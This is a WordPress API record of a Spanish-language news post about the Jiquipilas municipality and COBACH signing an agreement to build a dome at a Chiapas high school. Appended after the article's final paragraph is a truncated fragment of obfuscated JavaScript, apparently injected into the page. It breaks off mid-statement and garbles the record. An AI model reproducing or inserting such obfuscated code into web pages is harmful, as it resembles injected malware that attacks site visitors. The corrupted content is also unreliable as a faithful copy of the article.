{"id":5469,"date":"2022-09-28T03:17:45","date_gmt":"2022-09-28T03:17:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5469"},"modified":"2022-09-28T03:17:46","modified_gmt":"2022-09-28T03:17:46","slug":"ayuntamiento-de-jiquipilas-y-cobach-firman-convenio-de-colaboracion-en-beneficio-de-las-y-los-estudiantes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5469","title":{"rendered":"Ayuntamiento de Jiquipilas y COBACH firman convenio de colaboraci\u00f3n en beneficio de las y los estudiantes."},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220927-WA0028-1024x577.jpg\" alt=\"\" class=\"wp-image-5470\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220927-WA0028-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220927-WA0028-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220927-WA0028-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220927-WA0028-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG-20220927-WA0028.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 El alcalde Hugo L\u00e1zaro y Jorge Luis Escand\u00f3n Hern\u00e1ndez, director general del cobach encabezaron el acto.<br>\u2022 La obra ser\u00e1 posible con una mezcla de recursos a trav\u00e9s de la Direcci\u00f3n General del COBACH.<\/p>\n\n\n\n<p>Jiquipilas, Chiapas.- El Gobierno Municipal que preside C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez y el Colegio de bachilleres de Chiapas que encabeza el Lic. Jorge Luis Escand\u00f3n Hern\u00e1ndez construir\u00e1n un domo en el COBACH 165 del ejido Benito con lo cual reafirman el compromiso por el tema educativo que es una de las principales prioridades de la administraci\u00f3n p\u00fablica.<\/p>\n\n\n\n<p>Ante el Director General del COBACH Jorge Luis Escand\u00f3n Hern\u00e1ndez, el Alcalde Hugo L\u00e1zaro firm\u00f3 el convenio de colaboraci\u00f3n con esta instituci\u00f3n para que a trav\u00e9s de una mezcla de recursos se logr\u00e9 la obra en este mismo a\u00f1o.<\/p>\n\n\n\n<p>\u201cEstamos contentos porque al firmar este convenio logramos un objetivo en bien de este plantel educativo y por supuesto en beneficio de la comunidad que hoy son testigos de este importante acto\u201d, subray\u00f3.<\/p>\n\n\n\n<p>L\u00e1zaro Rodr\u00edguez agradeci\u00f3 al Gobernador Rutilio Escand\u00f3n Cadenas por apoyar la educaci\u00f3n en Chiapas y en especial a Jiquipilas a trav\u00e9s de recursos del COBACH, al tiempo de refrendar su compromiso de continuar trabajando por el bienestar.<\/p>\n\n\n\n<p>Por su parte el titular del COBACH Jorge Luis Escand\u00f3n reconoci\u00f3 al edil jiquipilteco Hugo L\u00e1zaro por ser responsable, trabajador y una persona comprometida con la educaci\u00f3n, pues no dudo en firmar este convenio.<\/p>\n\n\n\n<p>Se anunci\u00f3 que en d\u00edas siguientes el COBACH 165 que atiende el Director Kevin Oswaldo Cruz tendr\u00e1 servicio de internet, asimismo el Mun\u00edcipe confirm\u00f3 que el pr\u00f3ximo semestre esta escuela contar\u00e1 con la Universidad Virtual de la UNACH donde ya est\u00e1n inscritos m\u00e1s de 300 alumnos.<\/p>\n\n\n\n<p>Estuvieron presentes en el acto Toni D\u00edaz Pineda Coordinador de la zona Istmo Costa del COBACH, Abel Hern\u00e1ndez Romero Presidente del Comit\u00e9 de Padres de familia y Marcos P\u00e9rez Hern\u00e1ndez comisariado ejidal de Benito Ju\u00e1rez entre otros invitados especiales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 El alcalde Hugo L\u00e1zaro y Jorge Luis Escand\u00f3n Hern\u00e1ndez, director general del cobach encabezaron el acto.\u2022 La obra ser\u00e1 posible con una mezcla de recursos a trav\u00e9s de la Direcci\u00f3n General del COBACH. Jiquipilas, Chiapas.- El Gobierno Municipal que preside C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez y el Colegio de bachilleres de Chiapas que encabeza el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5470,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5469","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5469","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5469"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5469\/revisions"}],"predecessor-version":[{"id":5471,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5469\/revisions\/5471"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5470"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5469"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5469"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5469"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}